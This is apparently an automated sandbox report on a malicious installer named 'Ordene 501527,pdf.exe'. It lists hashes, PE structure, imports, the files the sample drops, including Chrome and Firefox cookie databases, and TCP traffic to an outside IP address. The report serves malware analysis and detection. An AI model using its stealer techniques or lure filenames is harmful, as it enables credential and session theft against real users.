SHA-512:	1D3E7DD9A687580682CB827CAB4C3D50F9EEC145411EEE24261DB0F89B8A087B5B6DE57B33E2D6B6E807D9AA79005050E5E09A4D58FC60F4E48F31BD32C7BF72
Malicious:	false
Preview:	8..f9.8.f9..r..._.b.f9.....X.......?.u/8..nf._....u ..,..8..,9.....u...f.^.f.^.9...;..........X......f._...............$.........f9.......5h...f.^..b..9.5..q...X.f9.f._.8...#m.f.^........n........r..E5..........f._.f._.f.^.8.-.....^.f._......f9.P.............wZ.............8..@......1.......=....f9.f._.=.....4.! .W..f9....9...D9...b.........9.u..u......W..o..X..$...f9..........W!#.zg.9.8.Z.a.%.}+:.!_........^.@.hW0.>LQ{.N.."%eA.U5..v./.....G.n.j`K..7.((....rL\.g..5.......w.a.QY....puv.0......~.)....l..(.((.((.((.((.((.((.((.((.((.((.((.((.((..Q.9.8.Z.a.%.}+:.!_........^.@.hW0.>LQ{.N.."%eA.U5..v./.....G.n.j`K..7.((....rL\.g..5.......w.a.QY....puv.0......~.)....l...((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.....((.((.((.((.((.((.((.((.((.((.((.((.((.((.((..x.Q....((.((.((.((.((.((.((.((.((.((.((.((.((.((.(....s{(.((.((.((.((.((.((.((.((.((.((.((.((.((.((....... ..P...3....5z......m.......((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.((.(...(.((.

C:\Users\user\AppData\Roaming\ec0qfe1f.342\Chrome\Default\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	2.9216957692876595
Encrypted:	false
SSDEEP:	384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
MD5:	1A706D20E96086886B5D00D9698E09DF
SHA1:	DACF81D90647457585345BEDD6DE222E83FDE01F
SHA-256:	759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
SHA-512:	CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
Malicious:	false
Preview:	SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ec0qfe1f.342\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\flex\flex.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	108664
Entropy (8bit):	5.8959760602012965
Encrypted:	false
SSDEEP:	1536:QSF7vA1hRqHNxxMjlI3ZC+0CtOss6mdcQ6A4vhZ91RKGpQJN:nA1hYPMUs6mdclA4vhNRKG4N
MD5:	914F728C04D3EDDD5FBA59420E74E56B
SHA1:	8C68CA3F013C490161C0156EF359AF03594AE5E2
SHA-256:	7D3BDB5B7EE9685C7C18C0C3272DA2A593F6C5C326F1EA67F22AAE27C57BA1E6
SHA-512:	D7E49B361544BA22A0C66CF097E9D84DB4F3759FBCC20386251CAAC6DA80C591861C1468CB7A102EEE1A1F86C974086EBC61DE4027F9CD22AD06D63550400D6D
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: DHL_229140 documento de recebimento,pdf.exe, Detection: malicious, Browse Filename: Al#U0131nd#U0131 DHL_119040,pdf.exe, Detection: malicious, Browse Filename: ORD#U00da CEANNAIGH- 34002174.exe, Detection: malicious, Browse Filename: Nanda.exe, Detection: malicious, Browse Filename: #U56de#U590d#Uff1a#U63a1#U8cfc#U8a02#U55ae (PO_22-4556-1472_REV00).exe, Detection: malicious, Browse Filename: Nonfeelingly.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Tedy.164775.28245.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.MSIL.Inject.10631.exe, Detection: malicious, Browse Filename: Enquiry_#23062022.pdf.exe, Detection: malicious, Browse Filename: INV 1337.exe, Detection: malicious, Browse Filename: IV202102011_Invoice updated on May 2022.exe, Detection: malicious, Browse Filename: GTV3285776_06172022.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.27052.exe, Detection: malicious, Browse Filename: vbc.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.24313.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan005944781.27289.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Razy.950064.31800.exe, Detection: malicious, Browse Filename: ldzOp71fAH.exe, Detection: malicious, Browse Filename: 9114044_Shanghai Global Precision Invoice20210822.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.10169.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..X...........v... ........@.. ..............................O.....`.................................\v..O.......$............f..xB..........$u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B.................v......H.......(...................xE..$t......................................2~P....o.....r...p(....VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\flex\flex.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	486
Entropy (8bit):	5.043661544202442
Encrypted:	false
SSDEEP:	12:z30d30C4BFNY8fNFquci7S1pE+DPOCN6+QOH5JyY:z3I3+DO4UE+Tz5JB
MD5:	323764DD20845C0EE00598E8EE35467C
SHA1:	7A3DC131CCF4B3A41893F83C553193267A7F654F
SHA-256:	7DEBA11FDF38735A63038192BF033BAE7F49E72E598F0AEFD3FC626477A31FEF
SHA-512:	BF353BCB64D65024C7E627788D32087C15EC5F8780AACF61D57BC22923F2283D0A5ED389CA644270013835EF26269F2E5EEE4ED610AC88254855DE80D67F3700
Malicious:	false
Preview:	Microsoft .NET Framework CasPol 4.8.4084.0..for Microsoft .NET Framework version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....WARNING: The .NET Framework does not apply CAS policy by default. Any settings shown or modified by CasPol will only ..affect applications that opt into using CAS policy. ....Please see http://go.microsoft.com/fwlink/?LinkId=131738 for more information. ......ERROR: Not enough arguments....For usage information, use 'caspol -?'..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.549201429075207
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Ordene 501527,pdf.exe
File size:	596608
MD5:	5162b6782f86f1f24e8610544d159ae9
SHA1:	0d1ead84c74ee462976928783c1f733aa859bc94
SHA256:	6730e52c8075c7e044c2bbaf9f7ad8c0f7f8d03fb23adbd2331adc8b591caec7
SHA512:	ccbea38e4c47edf9172e47f8ea884bae222365500d17bc5d95bef911d64feb6857ac7c2d99bd9b6a0a6112a042ea0e74cd958b656883912827451f21c5113f83
SSDEEP:	6144:B6bAcJOv+qlAcxp8XNbu0lTCzYQhb3VG+rmAYJDB5aRELlQBjokpKE+c0AzugkGd:a+NniSb3VtrHSaklQBjo0KE+72jCMii
TLSH:	96C4AE4179B86ED3F57E03716CA7869212A8EC141672E71B3192FE17B4B23532B0F29D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....uY.................d....:....

File Icon


Icon Hash:	71c884a498dc7890

Static PE Info

General

Entrypoint:	0x403350
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759518 [Mon Jul 24 06:35:04 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Murdock Hjernespinds Orddannelserne ", OU="Beauti Pilede ", E=Sheeting@Beredelse213.Syn, O=Stregens, L=La Haie-Traversaine, S=Pays de la Loire, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	08/08/2022 04:49:24 07/08/2025 04:49:24
Subject Chain	CN="Murdock Hjernespinds Orddannelserne ", OU="Beauti Pilede ", E=Sheeting@Beredelse213.Syn, O=Stregens, L=La Haie-Traversaine, S=Pays de la Loire, C=FR
Version:	3
Thumbprint MD5:	D9460ED9973B95EA8561C6C26E032EC9
Thumbprint SHA-1:	64BCC2EC4F74B5FAADE9D48BAC0D710AFF171E4F
Thumbprint SHA-256:	599928258A412563BC2620CAD41D51A4EDCF5C8E724A9DF73E6996094DA70D1E
Serial:	F03396B055CCF99F

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A8A2Ch], eax
je 00007FE46088E853h
push ebx
call 00007FE460891AE9h
cmp eax, ebx
je 00007FE46088E849h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FE460891A63h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FE46088E82Ch
push 0000000Ah
call 00007FE460891ABCh
push 00000008h
call 00007FE460891AB5h
push 00000006h
mov dword ptr [007A8A24h], eax
call 00007FE460891AA9h
cmp eax, ebx
je 00007FE46088E851h
push 0000001Eh
call eax
test eax, eax
je 00007FE46088E849h
or byte ptr [007A8A2Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [007A8AF8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0079FEE0h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c4000	0x59b58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8fd60	0x1d20	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x63c8	0x6400	False	0.6766015625	data	6.504099201068482	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb38	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x1b000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c4000	0x59b58	0x59c00	False	0.4010598015320334	data	5.323726974368565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3c4328	0x42028	dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x406350	0xe8be	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x414c10	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295	English	United States
RT_ICON	0x418e38	0x25a8	data	English	United States
RT_ICON	0x41b3e0	0x10a8	data	English	United States
RT_ICON	0x41c488	0x988	data	English	United States
RT_ICON	0x41ce10	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x41d278	0x100	data	English	United States
RT_DIALOG	0x41d378	0x11c	data	English	United States
RT_DIALOG	0x41d498	0xc4	data	English	United States
RT_DIALOG	0x41d560	0x60	data	English	United States
RT_GROUP_ICON	0x41d5c0	0x68	data	English	United States
RT_VERSION	0x41d628	0x1ec	data	English	United States
RT_MANIFEST	0x41d818	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2022 13:30:13.447227001 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.466327906 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.466487885 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.467061996 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.487915039 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.487977028 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.488024950 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.488070965 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.488179922 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.488225937 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.488238096 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.507420063 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.507479906 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.507527113 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.507575035 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.507580042 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.507637024 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.507652998 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.507714987 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.507755041 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.507770061 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.507819891 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.507844925 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.507879972 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.507970095 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.508096933 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.527952909 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528047085 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528163910 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528171062 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528234005 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528254032 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528300047 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528325081 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528363943 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528397083 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528423071 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528475046 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528520107 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528533936 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528584957 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528584957 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528645039 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528659105 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528708935 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528738976 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528769016 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528819084 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528856993 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528871059 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528909922 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.528932095 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.528983116 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.529055119 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.529189110 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.548114061 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548171043 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548237085 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548281908 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.548350096 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548358917 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.548435926 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548449039 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.548599958 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548624039 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.548718929 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548748016 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.548803091 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548851013 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548897982 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548944950 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.548948050 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549010038 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549011946 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549073935 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549093008 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549141884 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549171925 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549204111 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549273014 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549290895 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549341917 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549345016 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549407005 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549454927 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549463987 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549527884 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549576044 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549609900 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549627066 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549681902 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549683094 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549741983 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549762964 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549804926 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549854994 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549901962 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549925089 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.549962044 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.549988031 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.550024986 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.550060034 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.550080061 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.550132036 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.550137043 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.550194979 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.550272942 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.550321102 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.550395966 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.570158958 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.570275068 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.570324898 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.570372105 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.570399046 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.570430994 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.570521116 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.570621014 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.570710897 CEST	80	49793	141.98.6.239	192.168.11.20
Aug 8, 2022 13:30:13.570774078 CEST	49793	80	192.168.11.20	141.98.6.239
Aug 8, 2022 13:30:13.570796013 CEST	80	49793	141.98.6.239	192.168.11.20
